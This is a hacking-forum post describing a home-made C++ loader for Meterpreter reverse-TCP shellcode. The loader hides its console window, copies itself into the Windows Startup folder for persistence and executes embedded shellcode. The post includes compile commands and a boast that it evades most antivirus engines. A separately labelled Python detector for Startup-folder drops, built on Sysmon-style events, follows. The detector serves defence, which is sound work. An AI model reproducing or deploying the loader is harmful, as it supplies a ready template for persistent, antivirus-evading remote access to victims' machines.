Hi, I thought I should start contributing to this forum because it's a sound forum! :lol: :lol: :lol:
I was doing some pentesting in my hacking lab and I came across a problem when using Meterpreter: automation and persistence. Yes, I know there are already premade modules for this, but they're not very Anti-Virus friendly!
My overall goal was to create a custom Meterpreter payload that would try and connect back to my host an infinite amount of times and copy itself to "C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" for persistence (yes, I know if I had a Meterpreter session on the hacked computer, I could just move the payload myself manually, but that takes too much time!).
So I first picked my payload, the x86 meterpreter_reverse_tcp, generated the shellcode in C format and removed the bad chars like '\x00' and '\xFF'.
And then I programmed this PoC custom Meterpreter payload. (I've been learning C++ for a couple of weeks now, so my code is not great, but it gets the job done!)
```cpp
#include <iostream>
#include "windows.h"
using namespace std;

unsigned char buf[] =
"\x89\xe0\xd9\xed\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" etc.. etc..
// Meterpreter generated shellcode with bad chars removed.

// http://stackoverflow.com/questions/622592/win32-programming-hiding-console-window#622666
void HideConsoleWindow()
{
    HWND HideConsoleWindow;
    AllocConsole();
    HideConsoleWindow = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(HideConsoleWindow, 0);
}

// char** argv points to the location of the executable being run.
int main(int argc, char** argv)
{
    HideConsoleWindow();
    // Copy file to Windows start up.
    CopyFile(argv[0], "C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\copied_payload.exe", 0);
    // Declare pointer on function.
    int (*func) ();
    // Cast shellcode into function.
    func = (int (*) ()) buf;
    // Call function (Execute shellcode).
    (int) (*func) ();
    return 0;
}
```

And that's my payload. I compiled my source code using GCC and the following flags.

```text
mingw32-g++.exe -Wall -O2 -fomit-frame-pointer -fexpensive-optimizations -Os -m32 -c "C:\Users\user\Documents\Code blocks\Meterpreter\main.cpp" -o obj\Release\main.o
mingw32-g++.exe -o bin\Release\Meterpreter.exe obj\Release\main.o -s -s -m32 -static-libgcc -static-libstdc++
```

And it worked like a charm! I also thought I'd give it an Anti-Virus scan because I was thinking the CopyFile to start up would surely flag?
https://www.virustotal.com/en/file/8773 ... 488118618/
Only 4 AVs out of 55, and the Anti-Virus I was against in my lab was avast!
I ran my custom payload on the Windows machine in my lab as admin, and escalated to NT system and no Anti-Virus flagging or Behavioural flagging came up!
Thanks for reading mate. :)
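A defender-side companion to the persistence step in the post, added here as an example (it is not the poster's code and not part of the thread): a small detector that scans Sysmon-style FileCreate records (Sysmon Event ID 11) for runnable files landing in a user's or the all-users Startup folder, and raises the score when the writing process itself runs from a user-writable directory such as Downloads, which is exactly the shape of the self-copy above. The tab-separated record layout, the sample events, the extension list and the directory patterns are constructed for the example and assume a default Windows profile layout.

```python
import ntpath
import re
from typing import Dict, List

# Per-user and all-users Startup folders in a default Windows profile layout
# (case-insensitive, as NTFS paths are).  Constructed for this example.
STARTUP_DIRS = [
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming\\microsoft\\windows"
               r"\\start menu\\programs\\startup\\", re.I),
    re.compile(r"^[a-z]:\\programdata\\microsoft\\windows"
               r"\\start menu\\programs\\startup\\", re.I),
]

# Extensions Explorer runs (or hands to a script host) at logon.  Constructed list.
RUNNABLE_EXTS = {".exe", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta", ".lnk"}

# Locations an ordinary user can write to; legitimate installers that
# populate Startup rarely execute from here.  Constructed list.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(downloads|desktop|documents|appdata\\local\\temp)\\", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one record of the constructed export format
    'EventID<TAB>Image<TAB>TargetFilename' (not Sysmon's native XML)."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 3:
        raise ValueError(f"malformed record: {line!r}")
    event_id, image, target = fields
    return {"EventID": event_id, "Image": image, "TargetFilename": target}


def in_startup_folder(path: str) -> bool:
    """True when the path lies directly under a Startup folder."""
    return any(rx.match(path) for rx in STARTUP_DIRS)


def is_runnable(path: str) -> bool:
    """ntpath handles backslash paths correctly even when run on Linux."""
    return ntpath.splitext(path)[1].lower() in RUNNABLE_EXTS


def score_event(ev: Dict[str, str]) -> int:
    """0: nothing of interest; 1: a runnable file was created in a Startup
    folder; 2: additionally the creating process runs from a user-writable
    directory (a downloaded binary copying itself, as in the post)."""
    if ev["EventID"] != "11":          # Sysmon Event ID 11 = FileCreate
        return 0
    target = ev["TargetFilename"]
    if not (in_startup_folder(target) and is_runnable(target)):
        return 0
    return 2 if USER_WRITABLE.match(ev["Image"]) else 1


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Run every record through score_event and return the alerts, in order."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        score = score_event(ev)
        if score:
            alerts.append({"score": score, "writer": ev["Image"],
                           "dropped": ev["TargetFilename"]})
    return alerts


# Constructed sample telemetry: one self-copy into Startup from Downloads,
# one installer placing a shortcut there, and three uninteresting events.
STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    "\t".join(["11", r"C:\Users\alice\Downloads\Meterpreter.exe", STARTUP + r"\copied_payload.exe"]),
    "\t".join(["11", r"C:\Program Files\VendorApp\setup.exe", STARTUP + r"\VendorTray.lnk"]),
    "\t".join(["11", r"C:\Users\alice\Downloads\Meterpreter.exe", STARTUP + r"\readme.txt"]),
    "\t".join(["1", r"C:\Windows\explorer.exe", ""]),
    "\t".join(["11", r"C:\Windows\System32\svchost.exe", r"C:\Users\alice\AppData\Local\Temp\tmp1234.exe"]),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed sample, the self-copy scores 2 and the vendor shortcut scores 1; the text file in Startup, the non-FileCreate event and the Temp write produce nothing. The two-tier score is the point: a Startup write alone is common enough (installers, tray apps) to drown an alert queue, whereas a Startup write by a process executing out of Downloads or Temp is the behavioural signal that a signature-based scan of the dropped file, which the post shows evading 51 of 55 engines, never looks at.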